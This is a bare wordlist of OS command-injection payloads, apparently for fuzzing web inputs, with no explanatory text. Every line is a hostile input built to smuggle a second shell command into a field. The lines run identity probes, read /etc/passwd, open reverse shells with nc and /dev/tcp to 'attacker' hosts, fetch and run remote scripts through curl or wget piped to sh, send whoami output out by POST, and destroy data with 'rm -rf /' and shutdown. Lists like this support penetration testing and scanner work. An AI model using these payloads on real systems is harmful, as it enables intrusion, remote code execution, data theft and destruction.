;id
|id
`id`
$(id)
; ping -c 4 attacker.com
; curl http://attacker.com/malware.sh | sh
; nslookup attacker.com
; id
; uname -a
; whoami
| whoami
| id
| ls -la /tmp
| cat /etc/passwd
| nc attacker.com 4444 -e /bin/sh
`whoami`
$(whoami)
; /bin/bash -i >& /dev/tcp/attacker.com/4444 0>&1
; nc -e /bin/sh attacker:4444
| nc -e /bin/bash attacker:4444
$(id)
`id`
$(whoami)
`ls -la`
%0a/bin/bash -c "bash -i >& /dev/tcp/attacker/4444 0>&1"
';phpinfo();//
| python -c "import os; os.system('id')"
| perl -e 'exec "id";'
& ping -c 4 attacker
; curl attacker/payload.sh | bash
| wget http://attacker/payload.sh -O- | sh
; rm -rf /
; sleep 5
| cat /etc/passwd
$(curl attacker/shell.sh)
`wget attacker/rev.sh -O - | sh`
&& curl -X POST attacker.com/ping?whoami=`whoami`
; shutdown -h now
"; nc -e /bin/sh attacker 4444; #
'; curl attacker/revshell.php | php; #
